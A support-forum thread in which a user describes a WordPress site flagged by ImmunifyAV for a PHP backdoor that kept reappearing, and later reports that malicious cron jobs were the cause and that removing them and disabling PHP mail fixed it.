Server infected, ImmunifyAV says SMW-BLKH-1485227-php.bkdr
When I run ImmunifyAV it says the file /home/.../public_html/wp-includes/options.php is infected by SMW-BLKH-1485227-php.bkdr Google doesn`t show any hits for it.
I can delete the file but if I refresh the folder it reappears again minutes later.
I have no idea how to find the running program that is creating this file and how to then remove it. I can attach the file if necessary, but don`t want to get flagged for attaching an `infected` file.
The cPanel Security Advisor scan shows everything as green and up to date.
Please advise on what further details I need to share so I can fix this.
Thanks.
-
Not sure why this was waiting approval for days. Anyway, I got assistance elsewhere so it's sorted now. 0 -
Hey there! Both myself and the backup technician that works forums ended up with the same days off, and Forums aren't usually staffed over the weekend, so that's why you had a longer-than-normal delay getting that approved. Can you post the resolution you found? 0 -
Ahhhhh, just bad timing It started sending spam emails and I was contacted by my host informing me I had to resolve the issue immediately. Turned out there were several cron jobs which downloaded the infected files and copied them to the folder above. Removed all the tasks from the cron queue, deleted the injected files and it's showing as clean. I still have no idea how the server was infected in the first place, I always ensure the latest patches and plugins are installed. Not being able to quickly turn off outgoing mail was frustrating, an option to do so in cpanel would be useful for situations like this. I had to stop the mail processes and edit php.ini to disable the mail processes. 0
Please sign in to leave a comment.
Comments
4 comments